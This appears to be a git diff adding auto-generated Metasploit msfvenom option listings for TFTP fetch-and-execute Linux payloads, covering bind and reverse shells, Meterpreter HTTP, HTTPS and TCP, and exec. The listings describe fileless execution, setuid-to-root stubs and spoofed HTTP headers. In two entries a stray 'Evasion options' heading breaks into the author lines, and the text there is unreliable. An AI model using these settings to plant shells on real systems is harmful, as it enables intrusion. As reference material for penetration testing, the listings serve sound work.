+ EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-ppc64-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-ppc64-shell_bind_tcp.txt new file mode 100644 index 0000000..bf142e4 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-ppc64-shell_bind_tcp.txt @@ -0,0 +1,78 @@ + + Name: TFTP Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/tftp/ppc64/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME gGIOtGxkQ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC64 payload from a TFTP server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-ppc64-shell_find_port.txt b/msfvenom/payload_options/cmd-linux-tftp-ppc64-shell_find_port.txt new file mode 100644 index 0000000..e202f39 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-ppc64-shell_find_port.txt @@ -0,0 +1,77 @@ + + Name: TFTP Fetch, Linux Command Shell, Find Port Inline + Module: payload/cmd/linux/tftp/ppc64/shell_find_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CPORT 14265 no The local client port +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME qXXwjWOSZEAq no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC64 payload from a TFTP server. + Spawn a shell on an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-ppc64-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-ppc64-shell_reverse_tcp.txt new file mode 100644 index 0000000..2b4a1a3 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-ppc64-shell_reverse_tcp.txt @@ -0,0 +1,85 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/tftp/ppc64/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME MtuvaTaMdXW no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC64 payload from a TFTP server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-ppc64le-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-tftp-ppc64le-meterpreter_reverse_http.txt new file mode 100644 index 0000000..1405f1b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-ppc64le-meterpreter_reverse_http.txt @@ -0,0 +1,104 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/ppc64le/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/tftp/ppc64le/meterpreter_reverse_http: +========================= + +@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME QnbtsyKEP no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a PPC64LE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-ppc64le-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-tftp-ppc64le-meterpreter_reverse_https.txt new file mode 100644 index 0000000..9e37030 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-ppc64le-meterpreter_reverse_https.txt @@ -0,0 +1,106 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/ppc64le/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Br +Evasion options for payload/cmd/linux/tftp/ppc64le/meterpreter_reverse_https: +========================= + +apid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME OQtwRRKi no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a PPC64LE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-ppc64le-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-ppc64le-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..94c5e91 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-ppc64le-meterpreter_reverse_tcp.txt @@ -0,0 +1,97 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/ppc64le/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME OiezjeDE no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a PPC64LE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-exec.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-exec.txt new file mode 100644 index 0000000..24e25e7 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-exec.txt @@ -0,0 +1,71 @@ + + Name: TFTP Fetch, Linux Execute Command + Module: payload/cmd/linux/tftp/x64/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + ricky + Geyslan G. Bem + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD no The command string to execute +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME VjCIbhhBJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain 